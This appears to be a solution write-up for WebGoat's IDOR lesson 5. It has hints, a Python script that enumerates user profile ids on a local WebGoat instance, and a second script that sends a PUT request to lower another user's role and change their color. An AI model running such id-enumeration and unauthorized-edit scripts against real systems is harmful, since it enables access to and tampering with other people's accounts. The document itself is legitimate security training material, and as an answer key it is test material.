Insecure Direct Object Reference (5)

Playing with the Patterns

View Another Profile

View someone else’s profile by using the alternate path you already used to view your own profile. Use the 'View Profile' button and intercept/modify the request to view another profile. Alternatively, you may be able to issue a manual GET request from your browser.

Edit Another Profile

Older apps may follow different patterns, but RESTful apps (which is what’s going on here) often just change methods (and include a body or not) to perform different functions.

Use that knowledge to take the same base request and change its method, path and body (payload) to modify another user’s (Buffalo Bill’s) profile. Change the role to a lower number, since higher-privilege roles and users usually have lower numbers. Also change the user’s color to 'red'.

Solution

💡 The default request here won't work at all, so you will need to manually craft the request or tamper with it in a proxy
💡 You will likely need to 'fuzz' to try different values for the userId at the end of the URL
💡 Try incrementing the id value. It's not a simple +1, but it's also not too far off
💡 For editing the other user's profile, you will need to use the proxy or manually craft the request again
💡 To edit the other user's profile, you will use the same URL you did to view the other user's profile
💡 To edit, you will need to change the method. What is the RESTful method used for 'update' or 'edit'?
💡 You will also need the body of the request (it will look something like the profile)
💡 The request should go to ... /WebGoat/IDOR/profile/{Buffalo Bills Id}
💡 Your payload should look something like ... {"role" : 1,"color" : "red","size" : "small","name" : "Tom Cat","userId" : "2342388"}

View Another Profile: The script below fuzzes the URL found in the previous exercise, incrementing the userId until the server answers with something other than a 500. We find another profile at 2342388.

import requests

# Session cookie copied from the browser (JSESSIONID=...); the page does not include the value.
COOKIE = 'JSESSIONID=<your session cookie>'

def idor_5():
    index = 2342300        # start a little below the id seen in the previous exercise
    own_id = 2342384       # our own profile id from the previous exercise, which we skip

    headers = {
        'Cookie': COOKIE,
    }

    # WebGoat answers 500 for ids that do not exist, so any other status is a real profile.
    # The upper bound is only a safety cap so the loop cannot run forever.
    while index < 2342500:
        r = requests.get('http://192.168.99.100:8080/WebGoat/IDOR/profile/{}'.format(index), headers=headers)

        if r.status_code != 500 and index != own_id:
            print("Index: {}".format(index))
            return index
        index += 1
    return None

idor_5()

Edit Another Profile: Using the same session cookie, send a PUT request to http://192.168.99.100:8080/WebGoat/IDOR/profile/2342388 with the header Content-Type: application/json and the body {"role":1, "color":"red", "size":"large", "name":"Buffalo Bill", "userId":2342388}. This is the same URL as the view request; only the method and the body change, with the role lowered to 1 and the color set to red as the exercise asks.
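The two steps above (fuzz the id with GET, then switch the same URL to PUT) as one script. This is an added example, not code from the page or from WebGoat; it uses only the standard library, so it can be run against a live instance or checked offline by swapping in a fake `fetch`. The base URL is taken from the page's script; COOKIE is a placeholder you must replace, the scan window of 200 ids is an assumption, and 2342384 is assumed to be your own profile id, which the page's script also skips.

```python
import json
import urllib.error
import urllib.request

# Assumptions (not from the page): WebGoat base URL from the page's script, and a session
# cookie copied from the browser. Replace COOKIE before running against a live instance.
BASE_URL = "http://192.168.99.100:8080/WebGoat"
COOKIE = "JSESSIONID=replace-with-your-session-cookie"


def profile_url(user_id):
    # The same resource path serves both the view (GET) and the edit (PUT)
    return f"{BASE_URL}/IDOR/profile/{user_id}"


def build_view_request(user_id, cookie=COOKIE):
    # Direct object reference: the profile id is the only thing selecting whose data we get
    return urllib.request.Request(profile_url(user_id), headers={"Cookie": cookie}, method="GET")


def build_edit_request(user_id, role, color, name, size, cookie=COOKIE):
    # RESTful pattern: same URL, method switched to PUT, body mirrors the JSON the GET returned
    payload = {"role": role, "color": color, "size": size, "name": name, "userId": user_id}
    return urllib.request.Request(
        profile_url(user_id),
        data=json.dumps(payload).encode(),
        headers={"Cookie": cookie, "Content-Type": "application/json"},
        method="PUT",
    )


def request_summary(req):
    # (method, url, content type, decoded body) so a request can be inspected before it is sent
    body = json.loads(req.data) if req.data else None
    return req.get_method(), req.full_url, req.get_header("Content-type"), body


def fetch_status(req):
    # Send the request and return the HTTP status; urllib raises on 4xx/5xx, so unwrap the code
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def find_other_profile(own_id, start, window, fetch=fetch_status, cookie=COOKIE):
    # Scan a window of ids (the target is close to ours but not +1), skipping our own id.
    # WebGoat answers 500 for ids that do not exist, so any other status is a hit.
    for candidate in range(start, start + window):
        if candidate == own_id:
            continue
        if fetch(build_view_request(candidate, cookie)) != 500:
            return candidate
    return None


if __name__ == "__main__":
    # Live run against WebGoat: find Buffalo Bill's id, then edit his profile with a PUT
    target = find_other_profile(own_id=2342384, start=2342300, window=200)
    print("found profile id:", target)
    if target is not None:
        edit = build_edit_request(target, role=1, color="red", name="Buffalo Bill", size="large")
        print(request_summary(edit))
        print("PUT status:", fetch_status(edit))
```

The `fetch` parameter exists so the scan logic can be exercised without a server; in a live run, `fetch_status` converts the HTTPError that urllib raises for a 500 into a plain status code, which is what the scan keys on.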
